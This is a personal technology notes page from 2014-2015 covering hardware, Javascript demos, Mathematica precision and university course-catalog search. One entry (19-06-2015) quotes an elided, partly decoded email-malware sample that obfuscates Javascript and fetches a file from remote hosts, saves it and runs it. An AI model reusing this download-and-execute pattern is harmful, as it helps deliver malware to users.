Technology related projects

Techdemo (2012), 3D printing (2012), Graph project (2011), Structure from Motion (2009, 2007), Geodesics (2009, 2008), Flash PITF (2004), Sofia AI project (2003/2004), CCP I, II (2001)

Technology notes 2007-2010, 2011-2015, 2016, Now

18-12-2015: The new Apple magic keyboards are fantastic, the best keyboards I have ever worked on. I hated the old Apple bluetooth keyboards, which would disconnect easily or have their batteries die. Now I no longer have to buy overpriced used USB Apple keyboards. The new magic keyboard has a Lightning connector which can be hard wired, allowing a constant USB connection. This is now unproblematic and reliable, also with Linux. Having only one type of keyboard for all machines lets me work a notch faster.
10-12-2015: To test the new Apple stylus on the iPad Pro, here are some sketches. I used to do all writing and sketching with my finger, then used the Adonit Jot mini for some months. What is really nice about the Apple stylus is that it feels like an ordinary pen: with suitable apps, one does not have to worry at all about touching the screen. The screen becomes like paper; the finger and palm touches are completely ignored. It now feels almost like writing on paper. For reading text (I have lots of scanned PDF books), the iPad Pro is much better; the text now has the clarity of real print. The fact that the stylus can be charged by sticking it into the iPad is nice, but having it stuck there makes it very vulnerable to breaking off. It's a 100 dollar pen!
22-11-2015: Some experiments by Jonah Wagner, a Swiss software developer: fluidwebgl by 29a.ch, neonflames by 29a.ch, webglice by 29a.ch or chaotic particles by 29a.ch.
08-11-2015: The possibilities to look things up or ask questions online today are exploding: Slader, a homework sharing website; Quora for asking questions; Calcchat for study guides; for integer sequences; Stack exchange with Stackoverflow for programming; Stack exchange for math; definite integrals; Wolfram alpha and of course Wikipedia. It's getting harder and harder today to avoid information overflow.
24-10-2015: Youtube starts to crack down more on copyrighted content. The reason is the introduction of "Youtube Red", which required Google to renegotiate content deals with producers. They certainly have the right to do so, but it raises concerns that even minor copyright issues which pass today will be banned in the future. Moral of the story: keep the master files (I deleted much of mine since Final Cut keeps such large files).
23-10-2015: While Mimic is funny, there is a serious side. I have used the demoronizer for more than a decade (practically in any script which processes content from a website), as Microsoft in its "time of evil" completely ruined things. We have got used to it, but it still happens to me regularly that a string of Microsoft (or Adobe) origin (especially " or - symbols) prevents a program from running. There is nothing more frustrating than having two texts which look identical in the editor, where one works and the other does not, and where only inspecting the file with a hex editor reveals the hidden difference.
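The idea behind such a cleanup script can be sketched in a few lines of Javascript. This is only a minimal illustration; the character table below is a small assumed subset of what the real demoronizer handles:

```javascript
// Minimal sketch of a "demoronizer": map Windows/Unicode "smart"
// punctuation back to plain ASCII so that scripts stop choking on it.
// The mapping table is an assumed small subset, not the full tool.
function demoronize(s) {
  const map = {
    '\u2018': "'", '\u2019': "'",   // curly single quotes
    '\u201C': '"', '\u201D': '"',   // curly double quotes
    '\u2013': '-', '\u2014': '--',  // en and em dashes
    '\u2026': '...',                // ellipsis
    '\u00A0': ' '                   // non-breaking space
  };
  return s.replace(/[\u2018\u2019\u201C\u201D\u2013\u2014\u2026\u00A0]/g,
                   c => map[c]);
}
```

Running every scraped string through such a filter before further processing avoids the "two identical-looking files" trap described above.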
02-10-2015: Update to El Capitan in OS X. Everything smooth, except more nagging about using the cloud, and again disappearing scroll bars. Small things, but they test the nerves.
20-09-2015: Everybody talks about moving their stuff to centralized server farms (aka "the cloud" in marketing buzz). It's part of globalization culture and a game theoretical equilibrium, even though every centralization and monoculture increases global risk. A glimpse of what could happen if a big data provider like Amazon goes blank for a while can be seen in the "Cloudopocalypse" or in data breaches: security, medical records, breaches. What happens if the majority of businesses have outsourced their data to big brother? The problem is that if a substantial part of businesses are shut down at the same time, there is a risk of a global economic meltdown, similar to when big banks fail.
18-07-2015: Game of life in Javascript. A cruel moment while writing, because I first thought one could copy variables with C = c.getImageData(0,0,l,l); C1 = C;. It almost works in Javascript, but C1 is actually a pointer to the same memory block. One has to allocate an independent second image data memory block. The problem (and the reason for a three hour agony of finding the mistake in the program) was that it almost worked: it looked like life, only the gliders did not evolve correctly. One could avoid allocating a second block of memory, but that would make the program larger, as one has to keep a memory block around while doing the update. Making the program smaller does not make it faster: when adding a third loop, for example over the color fibre, the program slows down considerably.
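The aliasing bug can be demonstrated outside the browser; here is a sketch with a typed array standing in for ImageData.data (in the browser, the fix would be along the lines of ctx.createImageData followed by copying the data):

```javascript
// The bug: C1 = C does not copy pixels, it copies the reference.
// A Uint8ClampedArray stands in for ImageData.data here.
const C = new Uint8ClampedArray([255, 0, 0, 255]); // one red pixel
const alias = C;       // NOT a copy: same memory block
alias[0] = 0;          // C[0] changes too - the "almost works" symptom

// The fix: allocate an independent block and copy into it.
const copy = new Uint8ClampedArray(C); // independent memory
copy[1] = 255;         // C[1] stays unchanged
// In the browser, roughly: const C1 = ctx.createImageData(C);
//                          C1.data.set(C.data);
```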
16-07-2015: Tests with image manipulation. I begin to dig the way Javascript can deal with pictures: a blur example, a cellular automaton. The latter is mathematically interesting, as any figure will converge to a rectangle and the color pattern inside will show interesting random patterns. Also: translation and life.
15-07-2015: Javascript implementation of the double pendulum, one of my favorite systems, as the ergodic behavior of this system is still completely in the fog. A bit surprised how fast a Javascript implementation of the Chirikov map is: it can compete with the Java implementation, though of course not with the C implementation. Javascript is great because it is going to stay, unlike plugin-based technologies like Flash or Java.
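The Chirikov standard map is just the iteration p -> p + K sin(x), x -> x + p (mod 2 pi), so the inner loop is tiny. A minimal sketch (K and the iteration count here are arbitrary choices, not those of the animation):

```javascript
// Chirikov standard map: p -> p + K*sin(x), x -> x + p (mod 2*pi).
// Sketch of the iteration loop; K and steps are arbitrary here.
function standardMap(x, p, K, steps) {
  const TAU = 2 * Math.PI;
  for (let i = 0; i < steps; i++) {
    p = p + K * Math.sin(x);
    x = (x + p) % TAU;
    if (x < 0) x += TAU;  // keep the angle in [0, 2*pi)
  }
  return [x, p];
}
```

A loop like this runs millions of iterations per second in a modern Javascript engine, which is why it can compete with Java.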
14-07-2015: Live from Northwest building B103, town hall meeting about the new student information system: the course catalog is one of the most important pieces of information a university can provide. In the last decade, this information has been made available in a simple, accessible and timely manner by the registrar. We only learn now how important it was, once it was taken from us. The current search catalog is incomplete, erratic and misleading. Search has three fundamental problems: it is biased, it is erratic and it is unverifiable. An announced API has the same problem: it is impossible to verify whether the information is correct. An example of bias is the alphabet: some courses come first just because they appear first alphabetically. Filters produce a gamble. During the presentation, it was announced that some selected students had been asked to find specific courses in the catalog. There was no mention of whether anybody found anything, but there were prizes at least! Well deserved. A good treasure hunt question would have been "Find mathematics courses!" As screen shots show, it is not easy. How big is the catalog? We got a database dump of the math department courses: a 70K text file. There is much more convoluted Javascript on the new search system. Just dump the catalog files on the web for each department and the search problem is solved.
10-07-2015: The course catalog of a university is one of its most important information sources. Unfortunately, the current search-only interface is equipped with complicated filters and is unable even to separate out individual departments. Compare this with the excellent, extreme clarity of the static pages provided in the past. Currently, when searching for math, math courses don't appear, but there is a Bioelectromagnetics course on the first page. Why is a "search only catalog" a huge problem?

  1. Search is always biased (for example by alphabet, by filters, by preferences).
  2. Nobody looks beyond the first few pages (a problem if one's entries come late in the order).
  3. Search is hard to interface (it is impossible to scrape the information).
  4. Search is not verifiable (different queries give different search results).
  5. Search is complicated (especially if many filters are in place).
  6. Search is not auditable (did the database forget something?).
19-06-2015: Just looked more carefully at one of the many js-email malware samples, script kiddie stuff as it appears on github. The text is Notice to Appear, You have to appear in the Court .... Kind regards, Mario Stein, District Clerk. It contains a zip file with obfuscated js code like: var stroke="55...11"; function a207() { return 'd="+s'; }; function a39() { return '{ '; }; function a197() { return 'tp:'; }; .... for (var hn=1; hn<=236; hn++) { gn += this['a'+hn](); } this[a0()](gn); When decoded, it becomes function dl(fr) { var b = "h....com d....com t...com".split(" "); ... xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; ... xo.open("GET","http://"+b[i]+"/document.php?rnd="+fr+"&id="+stroke, false); xo.send(); ... dl(5951); dl(1802); dl(543); obviously trying to boost some companies. It illustrates how low the SEO optimization industry has sunk. The code would probably run only on Internet Explorer with ActiveX enabled. Idiotic attempts, which still seem to work.
19-06-2015: A strange threshold behavior in Mathematica: Simplify[(1 - x^7)/(1 - x)] gives 1 + x + x^2 + x^3 + x^4 + x^5 + x^6, while Simplify[(1 - x^8)/(1 - x)] does not give the sum any more. One can push it one notch higher with Simplify[Expand[(1 - x^9)/(1 - x)]], which gives 1 + x + x^2 + x^3 + x^4 + x^5 + x^6 + x^7 + x^8, but Simplify[Expand[(1 - x^10)/(1 - x)]] refuses to give the sum any more. Instead of a series expansion, here is an elegant way: f=Expand[Factor[(1 - x^20)/(1 - x)]]. Why is this interesting to me? Because polynomials represent graphs, as used in this construction. The graph of 1+x+x^2+x^3+x^4, for example, is the graph K_5. Picture of K40. More interesting are cases like (1-x)(1-x^2)(1-x^3)...(1-x^n), whose expansion starts with 1 - x - x^2 + x^5 + x^7 - x^12 - x^15 ... and is the subject of Euler's pentagonal number theorem. I had discovered the theorem in the theory of partitions in a project done during high school, but had no series expansion techniques to prove it then. Here is the graph belonging to the above polynomial with n=21.
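The identity Simplify handles only up to a size threshold, (1 - x^n)/(1 - x) = 1 + x + ... + x^(n-1), is easy to sanity check numerically; here is a quick sketch in Javascript (not Mathematica):

```javascript
// Numeric check of the geometric sum identity
// (1 - x^n)/(1 - x) = 1 + x + ... + x^(n-1), for x != 1.
function lhs(x, n) { return (1 - Math.pow(x, n)) / (1 - x); }
function rhs(x, n) {
  let s = 0;
  for (let k = 0; k < n; k++) s += Math.pow(x, k);
  return s;
}
```

Of course this only verifies the identity at sample points; the symbolic statement is what Factor recovers.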
18-06-2015: Search is not easy and, more importantly, is almost impossible to audit. Despite an abundance of good search engines, it is still an unsolved (maybe unsolvable) problem to get results that are comprehensive, relevant, and verifiably complete for the user. While the order in which results are presented is often computed quite well with democratic page rank methods, it leaves the user unsure whether the results are really fair or whether there is some bias. The search bubble problem, as well as the not always impeccable taste of crowds and social network effects, can distort reality. Companies like Google are under heavy attack in Europe as they are accused of distorting search results; phenomena like "Google bombs" or "Colbert" or "4chan" stunts illustrate how popularity votes can be gamed and manipulated quite easily. Manipulations through SEO have become less efficient recently thanks to the search engines becoming smarter, but one has not yet learned how to deal with social network search distortions, distortions by individualized search, or how to detect manipulations by the search engine itself. The actions against SEO methods, for example, make search less transparent. In a complicated search algorithm, it is today almost impossible to detect whether bias was injected by the search tool itself. The problem becomes apparent also when building small search interfaces for catalogs, as in online stores like Amazon or in course search tools at universities. This is why for basic things like course catalogs a browsing alternative is important which does not involve search. A browsable catalog is auditable: faculty, for example, can see whether their course is there, and staff can use it to plan. Search might lead to a course in one way but not in another. How can one verify that a department's course is listed when students search for it? How can one find out where the listings occur?
With a searchable catalog this is not possible, and all searchable catalogs seen so far have catastrophic shortcomings, even when the best programmers build them.
17-05-2015: To see how strong the GTX 970 graphics card is, I tried out GTA 5 on my home Thinkmate workstation. (I installed a fresh Windows 7 temporarily on a separate 250 Gig SSD, but could not install the game from the CDs and had to download it from Social Club. The entire Windows and game installation had to be repeated because Windows 7 became unbootable and unrepairable with the mix of graphics card, 4K monitor and Windows updates. (It seems like a lot of time, but of course I do things in parallel on other machines while the updates and installations run.) The second time, I refused all Windows updates and things went through fine. Since I only use this temporarily and for that game, I don't need updates.) The graphics are gorgeous. Articles like here mention the need for more graphics cards. The game works in full 4K with a 50+ Hz frame rate quite well on a single graphics card (there are situations where the frame rate drops, and two cards definitely would help). A special driver by NVIDIA, released just a month ago and just for that game, seems to have done the job even though I'm only on one graphics card. The detail of the graphics is amazing. The game industry seems almost on par with the movie industry; little details like a cat running through the scene or books on the table of the psychiatrist Isiah Friedlander look almost real. Besides wanting to touch Windows only with a yard stick, there was another reason to install and try out everything on a physically separate hard drive which needs to be detached: these games can become addictive; like math problems, they suck you in. It happened twice: once at Caltech, I played MYST for about 3 weeks, and about 15 years ago, I ran Crossover on my Linux box and played Wolfenstein over a summer. Just looked again: Crossover has not worked with GTA 5 yet. Fortunately so; I would not want it to be so easy to switch. Currently, I need to physically swap the SSD to play it.
16-05-2015: Spilled Starbucks coffee over my Mac Air, right on the back of the keyboard and the bottom of the screen. It must have been a mouthful which went directly into the guts of the laptop and onto the top part of the keyboard. It immediately went dead. I tried to dry it, at some point even with the hair dryer, which online guides don't recommend as it might heat up parts too much and bombard the inside with burned dust. Whenever the lid was open, the battery part on the bottom would get hot: obviously a short circuit. To prevent overheating, I put it into the freezer, which is problematic due to condensation, but it might have saved the machine by keeping it cool until the battery was empty. According to the book, the next thing would be to wait 48 hours until everything has dried. But I needed some files. So I placed the laptop, lid open, over a large window fan and let it vent over night. This must have done the job and dried out everything. After a recharge, the laptop booted up fine again this morning.
12-05-2015: Not so much about technology, but about memory access in the brain; here are two observations about memory. For gym locker numbers, I seem to have a fixed allocated register: if I learn a new locker number, the old one gets lost almost immediately. It happened that I had to buy a new lock because the old one seemed lost, but then it reappeared in a corner of the backpack; I was unable to get the old one open, as the new code had overwritten it. A similar thing happens to me with home telephone numbers: I don't recall old home telephone numbers; there again seems to be a fixed memory block allocated to that information. Quite efficient. Another interesting observation is that some parts of my memory are visual. This morning, I got to a bank ATM where the number pad was reversed (there is an annoying inconsistency between calculator pads, where the 1 is bottom-left, and telephone pads, where the 1 is top-left; the ATM had the calculator order and not the telephone order). When exposed to the reversed pad, I could not remember the PIN at first; I had to type it on a usual pad to recover it. It appears that the PIN is stored in my memory as a geometric figure rather than as a sequence of numbers. When learning piano pieces by heart, I also seemed to have the pieces stored geometrically, as I would have to play a piece to get the sequence of notes. The piece seemed to be stored in the fingers.
08-05-2015: I wanted to see how powerful the new GTX 970 graphics card is with games. But installing Windows 7 on a fresh SSD was like going 20 years back. I don't think I ever had such problems in Linux, and I have been using the latter for 19 years. The only hack which worked (after about 5 attempts) to get a fresh Windows 7 onto a new Samsung SSD was copying the CD to the hard drive, then installing from there; otherwise, the installer would simply refuse to do it. Here is the procedure. Neither networking nor the Samsung monitor works without drivers, of course. I also needed to shuffle tools and drivers back and forth, because a fresh Windows has no drivers at all, can not access the internet, and can not use the monitor properly. Even the very first Linux systems, which came on floppies, were better in this respect.
03-05-2015: I use for the first time a 4K display in Linux: a beautiful 3840x2160 pixel Samsung U28D590 monitor and a decent GTX 970 graphics card. Both with HDMI and DFP-2, I get 60 Hz at 3840x2160 pixels. The monitor is not only more energy efficient than the old one, it is also twice as thin, half the weight, and looks good. The configuration was initiated with the NVIDIA tool. A screenshot (PNG, 3840x2160 pixels) shows that while the display is crystal sharp, the fonts are too small. Since I use good old blackbox and xterms, I will have to adapt things myself. I usually call xterm with a shell program, something like `/usr/bin/xterm +cm -sb -bg black -cr yellow -hc red -fg white -fa 'Monospace' -fs 12`. This allows fixing the default font size.
16-04-2015: Just got the new MacBook from the Cambridge Apple store. I had ordered it the night it came out and like the look and feel. I still wish I could have got a 1T HD version, as my other 500 G laptop is full (I have to clean out all the Final Cut stuff). The longer battery life, the better sound and the wonderful keyboard will be appreciated, however, as well as the better screen resolution and the smaller size. I changed my mind about the new USB-C port: I got one adapter which does video, power and classical USB, and that will do the job. There is no need to have the clutter at the machine. It is an opportunity for adapter builders to build a small USB-C adapter which, like a Swiss army knife, can morph into anything. Only the thunderbolt adapter is missing for now. It is the future to have only one type of cable for everything. Update (4/17/15): It's a nice machine, but it's only half the joy if one can not show it off! Here are pictures (click for the large pictures).
26-03-2015: A Buffon needle animation in Javascript. This too is executed in the browser, is open source, has no libraries and consists of only a few lines. Older iPads skip some frames.
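The Monte Carlo core behind such an animation fits in a few lines: with needle length equal to the line spacing, the crossing probability is 2/pi, so pi can be estimated as 2N/hits. A sketch (not the animation's actual code; N is an arbitrary choice):

```javascript
// Buffon needle Monte Carlo: needle of length 1 dropped on parallel
// lines at unit spacing. It crosses a line when the distance d from
// its center to the nearest line satisfies d <= sin(theta)/2.
// The crossing probability is 2/pi, so pi is estimated as 2*N/hits.
function buffonPi(N) {
  let hits = 0;
  for (let i = 0; i < N; i++) {
    const d = Math.random() / 2;            // center distance in [0, 1/2)
    const theta = Math.random() * Math.PI;  // needle angle in [0, pi)
    if (d <= Math.sin(theta) / 2) hits++;
  }
  return 2 * N / hits;
}
```

The estimate converges slowly (error of order 1/sqrt(N)), which is exactly what makes the animation instructive to watch.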
20-03-2015: Experimented with the graph database neo4j. Pretty cool, as graphs are very natural and general structures. I believe that I myself started to really "think" in graph structures when I started to use Unix, as I like to organize knowledge in knowledge trees (mind maps). Graph databases are in some sense equivalent to relational databases, as one can represent graphs using adjacency matrices (tables), but they appear more flexible, as often only a small part of a table is needed. Neo4j was extremely fast to get started with. The only problem with neo4j is the large footprint (it is written in Java). I had it running for about a week and my Linux box started to get slower. There are huge memory footprints also if Mathematica calls Java; in the latter case, some Java processes still survive after Mathematica is done.
10-03-2015: It's amazing that Javascript animations written 15 years ago still work without modifications. At that time, no canvas was available yet. For Pi day 2015, I wrote a little animation of the pi curlicue (I'm interested in curlicues as they are Birkhoff sums). Here is the golden mean curlicue animated with 12 lines of Javascript, no external libraries. This will continue to run without modifications in 20 years, on any device.
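A curlicue is drawn by connecting consecutive partial sums of exponential sums; one common convention uses the quadratic phase S_N = sum_{k=1}^{N} exp(2 pi i k^2 alpha) (the animation may use a slightly different phase). A sketch of the point computation:

```javascript
// Curlicue path: partial sums of exp(2*pi*i*k^2*alpha), returned as
// a list of [x, y] points to connect with line segments.
// (One common convention for the phase; assumed here.)
function curlicue(alpha, N) {
  const pts = [];
  let x = 0, y = 0;
  for (let k = 1; k <= N; k++) {
    const phi = 2 * Math.PI * k * k * alpha;
    x += Math.cos(phi);  // real part of the k-th term
    y += Math.sin(phi);  // imaginary part of the k-th term
    pts.push([x, y]);
  }
  return pts;
}
```

For irrational alpha like the golden mean, the path winds into the characteristic spirals; for rational alpha it is eventually periodic.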
08-03-2015: I had hoped for 1TB and 16 G memory options for the new Macbook. Seems not in the works. I wonder how the new single connection will work out. I loved the MagSafe connector and see trouble with an overused single connector (my thunderbolt adapter is wearing out since it is used for display as well as backup). How will it work for presentations, where you want to have a USB wireless mouse, an external display adapter, and possibly load a presentation from a USB key? Additionally, the new Macbook has a slower Core M processor (drawing less power and avoiding a fan).
06-03-2015: Some Keynote presentations from 2008 no longer open under the newest Keynote. Fortunately, I have kept an old version, Keynote 2009. It is annoying that after the conversion, the default is again to use Keynote 2009, requiring a reconfiguration; Apple should add an importer for old formats. I like, however, how Keynote keeps media and data in a separate folder: like this it is still possible to reconstruct some of the slides. But as presentations are a short lived thing which should not be recycled too much, losing some old stuff is not that terrible. More troublesome is losing text documents. I experienced this once, as the Moser script was first written with a proprietary text editor. This required rewriting everything from scratch, as even the emulators were no longer able to run the software.
20-02-2015: We live in a time with an amazing variety of teaching possibilities. The blackboard is one of the oldest tools. Here is a recording done on my "home blackboard". While it has ancient origins, the modern blackboard seems to have emerged only in 1801, when James Pillans used a large piece of slate on the classroom wall; in the US it was first used at West Point. Since the 60ies, greenboards became popular. They have less contrast, are usually portable, and are of inferior quality (at Harvard, there are some in SC Hall E on the side). What is nice about the blackboard: 1) It always works. 2) There is no technology distraction. 3) It naturally slows down the speaker. 4) If magnetic, one can do experiments on it. 5) It is effective: 5 years ago, I had spent some time doing this presentation. Making the slides and recording needed maybe 4 hours; the blackboard lecture was done in one take (30 minutes), and transferring to the computer and annotating was another hour. An already mentioned Slate article about it. Since the 90ies we see more and more white boards too. Cited reasons are the lack of dust and the ease of writing. But the markers actually produce a lot of dust (if they work), and breathing these chemicals is hardly healthier than chalk. As with overhead projectors, I have still to see a teacher who can write nicely on white boards (one tends to write sloppily and too small). Just as fountain pens make you write more neatly than ball pens, blackboards naturally force you to write slower and more precisely (at least for most people); the smallness of writing can still be a problem. Markers that have dried out also can not be used: I was once forced, at a conference in Vienna, to use a white board where the markers were dry, and had to give the talk without a board. White boards appear cheaper, but one has to buy a lot of markers and replace the boards frequently as they scratch easily.
05-02-2015: Content management systems for course websites have become complicated beasts. This is unavoidable, as one wants to cover a lot of different features in communication, content delivery and administration. Currently, FAS and the extension school are starting to implement Canvas, a learning management system already used by more than 1000 colleges. It will eventually replace iSites, which was built locally and has become pretty good over the more than 10 years it has been in place. As we can currently still use both, it's good to compare. I have only started to use it. Just a few general thoughts:
  • Using an external company instead of a house maintained system is part of a common trend of outsourcing IT to external companies. In a time of globalization, this might be unavoidable and natural; as everybody starts doing it, there is maybe no other choice. It will be interesting to see in the long term what it means to destroy a local IT culture and to depend on an external company which could change its policies and prices once it has become a dominant player. There are similar considerations when using other external tools like cloud services, which are still in the "buy in" phase of acquiring critical mass, destroying local IT culture and knowledge. Once customers are hooked, the companies can increase their prices and change their policies. Already now, many small businesses and private folks have outsourced their IT. Yes, it is convenient, but one has to see the drawbacks, like disappearing jobs (large companies tend to send jobs to countries with lower salaries), more risk (already today, if a major cloud provider were to melt down, it might, as with banks, be a risk for the global economy), or the loss of control over who can see the data (data can be read by third parties).
  • Canvas looks already quite stable. Alas, it also has invasive features reminiscent of the games other big players like Microsoft, Apple or Facebook play. It tries to lock you in, to absorb you into the system, not letting you out. This can be aggravating, especially if it starts to mess with your usual work flow. By far the most annoying example is that all communication goes through the Canvas company. The system even refuses to reveal the email addresses of students. There are lots of folks who complain about this, as it makes no sense to be so secretive except to lock you into the system. (Currently there are still other administrative services which allow access to the emails, but this might change.) What does it mean for a teacher using the system? All communication with students through Canvas is recorded for eternity. That is not such a big deal, as most email communication goes through some external company like Google, Yahoo etc.; what Canvas does with these emails is not clear. What is more problematic is that the system wants you to log into the Canvas page in order to actually communicate. This is cumbersome: you have to log into the system, navigate to the communication part, then use their massive and complicated email messaging system (a large system which needs to cover many different needs is always complicated; one has to go through about 10 steps to send a simple email, while with a usual email client it is 2 or 3). But the worst part is that it messes with your work flow, the use of the email client you are used to. It is also a bit of a black box: one has no idea what actually happened with the email. With standard email you at least get a feedback message if the email is undeliverable.
  • My biggest worries are about long-term archival, the movability and the accessibility of content. This is a common problem with content management systems, as they are database driven and the database is not accessible, not even to the user or customer. Many education content management systems are not globally accessible. iSites has the feature that all old pages and content are still available and movable. A weak part of iSites was that the URLs were terribly long and cryptic, and that the content was seldom searchable, as it was mostly outside the usual search engines and internal search features are always unusable (we have been spoiled by companies like Google who made search easy). Another annoying feature of iSites was that it was difficult to archive content and move it elsewhere (spider software is strictly excluded). So, as a teacher, any content you create is essentially content you might lose control over in the long term. As education becomes more and more an industry, it will be interesting to see whether academia will remain in charge of content, or whether there will be a time when knowledge is treated more and more like a commodity, sold and controlled by the highest bidder. Having seen all the developments (I have used the web for teaching in higher education since 1993), I have also seen many great companies grow, disappear, change their nature or be absorbed into larger structures. And looking back at the history of education, there were entire eons where education was less open and free than it is today. There is no reason why openness and freedom have to stay. It will be interesting to see how the "centralization of education" will work out. The worst case scenario is that the role of universities will diminish: we start to sell out to private companies, saving money in the short term but making ourselves redundant.
We have seen models where education was dominated by the church (Galileo felt that), times where it was funded and promoted by governments (Euler worked at the Russian academy of sciences) or the military (the Manhattan project temporarily employed many stellar scientists), and times where oligarchies or monarchies dominated education (Descartes was a private tutor to Queen Christina). Now we sell out to companies who listen to shareholders and stock prices and who become global players, serving thousands of universities. Providing "software as a service" is only a step away from providing "education as a service". But the euphemism "as a service" is a synonym for "outsourced".
  • In the short term, the most annoying feature of Canvas is being "spammed" with messages. I don't mind being spammed by real people sending me messages, even if they do so frequently and the messages contain new information. I mind being spammed by bots. Bots are already everywhere: Facebook, Linkedin, Twitter, news websites, companies where you are a customer; they all send automated messages regularly. Now Canvas has this annoying feature that it sends regular reminders about things. No other education content management system did so, so far; this is also the first time we use a system built by an external company which needs to make a profit. What is the effect? Of course, you start to ignore all these reminders. In an educational system it is a disaster if one can no longer distinguish between important announcements containing vital information sent by teaching staff and automated messages sent by the system. This is also annoying on the phone: there are now regular phone calls done by bots, in particular by political parties, which somehow get around the ban on using the phone as an advertising machine. In social media, we are well aware already that we are the "product". It just feels weird to see that in education, more and more, not only students but teachers and entire universities have become "the product".
03-01-2015: My favorite note taking app (Penultimate) has been trashed. The new version is a disaster: 1) starting up the app does not continue at the old place; 2) no note taking is possible without going through Evernote servers; 3) page flipping is complicated and unstable (if missing one finger, one writes on the screen); 4) the interface is too complicated, with too many steps (changing color and pen could be done in one step); 5) one can no longer email notes; everything you do is swallowed and owned by Evernote; 6) importing from Dropbox is possible, but there is no export.
16-12-2014: It had been a bit of a pain to render the pictures in this gallery with the older Mathematica 10.0 version, as the program had been very unstable, especially when run in batch mode. I had to write scripts which would wait a few seconds between each picture, kill any Mathematica or Java process, then continue, as any surviving processes would make further computations impossible. Now, with Mathematica 10.0.2, the stability is back. That was really important.
26-10-2014: A Heise article mentions trouble of Mathematica with determinants. The notebook, authored by Antonio J. Duran, Mario Perez and Juan L. Varona, deals with an applied problem. Maybe unrelated is an inconsistency with accuracy when dealing with determinants. Mathematica usually does well in similar situations: if no algebraic equations need to be solved, it computes with arbitrarily high precision. Determinants should not be different, as a determinant is just an algebraic expression in the matrix entries. Here is an example with matrix computation:
 $MaxPrecision = Infinity; $MaxExtraPrecision = 10000000;  
A=Table[3^(i*j)/2^(i-j),{i,30},{j,30}];   (* exact rational entries *)
A1=1.0*A;                                 (* machine-precision copy *)
B=MatrixPower[A,1000];  U=B[[3,3]];   N[U,100]
B1=MatrixPower[A1,1000]; U1=B1[[3,3]]; N[U1,100]
This is fine even after computing A^1000: you can check that even after 20'000 digits, the results agree. When determinants are involved, this is no longer the case:
 U=Det[A]; N[U] 
V=Det[A1]; N[V]
The first gives 9.86167·10^4503 while the second gives -4.95199415·10^5945. One remedy is to add more zeros after the 1. by hand, like here:
 $MaxPrecision = Infinity; $MaxExtraPrecision = 10000000;
F[n_] := Module[{}, A = Table[3^(i*j)/2^(i - j), {i, n}, {j, n}];
A1 = 1.00000000000000000000000*A;
N[Det[A], 1000] - N[Det[A1], 1000]];
Table[F[k], {k, 1, 30}]
The user needs to add more zeros by hand, even though the system was told to compute with higher precision. This is reminiscent of the true story of a teacher marking the answer 3. * 4. = 12 as wrong, because writing 3. indicates that one should only give the answer to one significant digit; the right answer in the exam was supposed to be 3. * 4. = 10. One can certainly justify this, but it is narrow-minded pedantry. What does the user have to do to force higher accuracy in Mathematica? One needs to add a fake number as above, 1.00000000000000000000000, which triggers the computation with higher accuracy.
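The underlying issue, machine numbers silently limiting accuracy, is easy to illustrate outside Mathematica too. Here is a small Python sketch (my own illustration, not the notebook's code): it builds the same matrix A[i,j] = 3^(i j)/2^(i-j) once with exact rationals (fractions.Fraction) and once with machine floats, and computes the determinant by Gaussian elimination both ways. The exact path keeps every digit; the float path rounds at every step.

```python
from fractions import Fraction

def det(m):
    """Determinant via Gaussian elimination with partial pivoting;
    exact if the entries are Fractions, rounded if they are floats."""
    m = [row[:] for row in m]   # work on a copy
    n, d = len(m), 1
    for c in range(n):
        p = max(range(c, n), key=lambda r: abs(m[r][c]))  # pivot row
        if m[p][c] == 0:
            return 0
        if p != c:
            m[c], m[p] = m[p], m[c]
            d = -d
        d = d * m[c][c]
        for r in range(c + 1, n):
            f = m[r][c] / m[c][c]
            for k in range(c, n):
                m[r][k] -= f * m[c][k]
    return d

def build(n, num):
    """The matrix A[i][j] = 3^(i j)/2^(i-j) with entry type num."""
    return [[num(3)**(i*j) / num(2)**(i-j) for j in range(1, n + 1)]
            for i in range(1, n + 1)]

exact  = det(build(8, Fraction))  # every digit correct
approx = det(build(8, float))     # machine precision throughout
print(float(exact), approx)
```

For n=2 both agree (the determinant is exactly 162); for larger n the float result typically drifts in the trailing digits, which is the effect the extra zeros after the 1. suppress in Mathematica.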
22-10-2014: Photo math, a glimpse of what we have to expect in the future. Imagine the phone chip implanted in the head, grabbing pictures from the eye. It could be great assistance in math tests.
16-10-2014: Yosemite runs without flaw so far on my iMac and MacBook Air. I'm not sure whether I like the font change. Everything looks flatter. The buttons on windows look too blurry, and the hard drive icons are just blobs of color. All icons in general look as if they have gone through a "water color" Photoshop filter. Even the menu entries look blurry (Helvetica fonts). When checking the "dark menu bar and Dock" option it can look decent, however. In general the OS feels a bit more responsive. There is a substantial change again in how Keynote stores the presentation. It is again a single file and no longer a folder. As I also sync presentations: if a presentation is changed, the entire multi-gig presentation file is synced and not only the changes. I had liked the unzipped version, but obviously they needed a single file for transfer between devices.
15-10-2014: A nice piece about the blackboard. I agree: blackboards always work and force one to write in a readable way (for most at least). Since my time as an undergraduate course assistant, I have also had to teach on whiteboards. The pens often dry out. Erasing does not work without heavy chemicals. One tends to write too small and sloppily. The boards are too small.
14-10-2014: Heartbleed, Shellshock and now Poodle. Names have effect and affect. And as the choice of operating systems is emotional and tied to business, one can only suspect that there is also a lot of propaganda involved in hyping these vulnerabilities by giving them catchy names, like the Rumpelstiltskin syndrome in medicine. The real risks of previous or existing zero-day vulnerabilities are much bigger. No wonder "Poodle" does not bite as much as "Heartbleed" or "Shellshock". The name HIV had less effect than AIDS; H1N1 was feared only after being called swine flu. Had Poodle remained CVE-2014-3566, nobody would even have noticed its bark. Every major operating system or complex program will regularly need updates and patches. Examples: Windows or Linux cases. US-CERT keeps track in general.
06-10-2014: We were experimenting with Mathematica solving some PDEs in multivariable calculus. An interesting issue came up: on different platforms, different answers appeared. For the following code, solving the wave equation in one dimension, we got either the value -0.250029 or -0.249797:
f[x_] := Sin[Pi 7 x]; g[x_] := 5 Sin[5 Pi x];
U = NDSolveValue[{D[u[t, x], {t, 2}] - D[u[t, x], {x, 2}] == 0,
u[0, x] == f[x], Derivative[1, 0][u][0, x] == g[x],
DirichletCondition[u[t, x] == f[0], x == 0],
DirichletCondition[u[t, x] == f[1], x == 1]},
u, {t, 0, 1}, {x, 0, 1}]; U[0.4,0.3]
